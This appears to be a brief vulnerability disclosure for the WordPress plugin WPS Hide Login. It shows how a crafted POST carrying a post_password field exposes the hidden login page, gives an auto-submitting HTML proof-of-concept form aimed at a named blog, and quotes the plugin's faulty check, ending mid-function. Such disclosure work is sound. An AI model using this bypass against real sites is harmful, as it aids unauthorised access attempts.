The protective feature of WPS Hide Login can be bypassed by sending a crafted POST request containg the field post_password towards the default WordPress login url /wp-login.php.
<form id="form" method="post" action="https://blog.sebastianschmitt.eu/wp-login.php">
<input type="hidden" name="post_password"/>
</form>
<script>
window.onload = function(){
document.forms['form'].submit();
}
</script>
In file /classes/plugin.php on line 494 the plugin explicitly checks for the absence of this POST field but no else-case is defined.
public function wp_loaded() {
global $pagenow;
$request = parse_url( rawurldecode( $_SERVER['REQUEST_URI'] ) );
if ( ! isset( $_POST['post_password'] ) ) {
if ( is_admin() && ! is_user_logged_in() && ! defined( 'DOING_AJAX' ) && $pagenow !== 'admin-post.php' && $request['path'] !== '/wp-admin/options.php' ) {